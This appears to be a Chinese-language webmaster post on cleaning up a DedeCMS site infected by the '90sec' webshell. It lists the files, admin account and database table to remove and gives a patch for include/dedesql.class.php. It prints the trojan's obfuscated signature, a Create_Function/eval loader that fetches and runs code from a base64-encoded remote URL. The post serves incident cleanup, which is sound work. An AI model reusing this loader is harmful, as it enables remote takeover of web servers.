织梦被挂马90sec,模板文件被修改,后台也增加了管理员账户。以下是解决方法的一些探索,都源自于网络,希望对大家有所帮助。
首先把模版修改回来吧。
清理方法:
1、删除增加的管理员:service
2、删除根目录的asdd.php
3、删除plus下的download.php,mytag_js.php90sec.php,service.php,vliw.php,vuew.php,digg.php,xiao.php,bakup.php等可疑文件。
4、织梦程序后台病毒扫描都会出现一个plus/90sec.php的文件,得每天删除,可是删除了,第二天就又出现了???可以能是getshell了,可以在后台->模板->自定义宏标记中删除其中的条目之后可以升级下include/dedesql.class.php文件即可.
5、chmod -R 555 xxxx.com/plus,给plus只读权限
6、删除data/cache/mytag-9013.htm 这种类型的所有htm文件,删除tplcache的缓存文件。
发现的越来越多了
7、数据库要清空dede_mytag表
最后备份数据,其实保险起见,最终的解决方法就是重装下程序吧,漏洞出来N天了,DEDE官方也没见说法,以上综合于网络。
补充:关闭php部分的Create_Function函数支持
木马特征码
//$_=@Create_Function(‘$X’,’@’.’E’.’v’.’a’.’l’.'(‘.’Gz’.’in’.’Fla’.’te’.'(‘.’Ba’.’se’.’64_’.’De’.’co’.’de’.'(‘.’Fi’.’le’.’_Ge’.’t_’.’Cont’.’ents’.'(‘.’Bas’.’e64′.’_De’.’co’.’de’.'($X)))));’);@$_(‘aH’.’R0′.’cDo’.’vL3d’.’3dy5h’.’cGku’.’Y29t’.’LmRlL’.’0JldC’.’9QR2F’.’tZS5n’.’aWY=’);
include/dedesql.class.php 漏洞修复
if(isset($GLOBALS['arrs1']))
{
$v1 = $v2 = '';
for($i=0;isset($arrs1[$i]);$i++)
{
$v1 .= chr($arrs1[$i]);
}
for($i=0;isset($arrs2[$i]);$i++)
{
//$v2 .= chr($arrs2[$i]);//注释这里
}
$GLOBALS[$v1] .= $v2;
}
